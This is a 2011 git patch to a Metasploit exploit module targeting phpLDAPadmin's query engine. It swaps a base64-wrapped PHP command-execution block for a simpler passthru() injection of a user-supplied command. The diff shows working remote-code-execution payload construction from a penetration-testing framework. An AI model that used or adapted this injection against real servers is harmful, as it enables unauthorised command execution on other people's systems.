From 7ba5a8ec4eed4162e65ac586805254cf0a1da0ba Mon Sep 17 00:00:00 2001
From: Wei Chen <Wei_Chen@rapid7.com>
Date: Tue, 25 Oct 2011 16:04:33 +0000
Subject: [PATCH] Module is busted when it loads, restoring to the original
 method.  Mixin should not be loaded into an exploit

git-svn-id: file:///home/svn/framework3/trunk@14061 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../multi/http/phpldapadmin_query_engine.rb         | 13 ++-----------
 1 file changed, 2 insertions(+), 11 deletions(-)

diff --git a/modules/exploits/multi/http/phpldapadmin_query_engine.rb b/modules/exploits/multi/http/phpldapadmin_query_engine.rb
index 3fb34425ef..76504228a3 100644
--- a/modules/exploits/multi/http/phpldapadmin_query_engine.rb
+++ b/modules/exploits/multi/http/phpldapadmin_query_engine.rb
@@ -15,7 +15,6 @@ class Metasploit3 < Msf::Exploit::Remote
 	Rank = ExcellentRanking
 
 	include Msf::Exploit::Remote::HttpClient
-	include Msf::Payload::Php
 
 	def initialize(info = {})
 		super(update_info(info,
@@ -109,16 +108,8 @@ class Metasploit3 < Msf::Exploit::Remote
 		# if we are using the exec CMD stager
 		# important to check which php functions are disabled
 		if datastore['CMD']
-			cmd = Rex::Text.encode_base64(datastore['CMD'])
-			dis = '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
-			out = '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
-			shell = <<-END_OF_PHP_CODE
-			$c = base64_decode("#{cmd}");
-			#{php_preamble({:disabled_varname => dis})}
-			#{php_system_block({:cmd_varname=>"$c", :disabled_varname => dis, :output_varname => out})}
-			echo #{out};
-			END_OF_PHP_CODE
-			p = Rex::Text.encode_base64(Rex::Text.compress(shell))
+			p = "passthru(\"%s\");" % datastore['CMD']
+			p = Rex::Text.encode_base64(p)
 		else
 			p = Rex::Text.encode_base64(payload.encoded)
 		end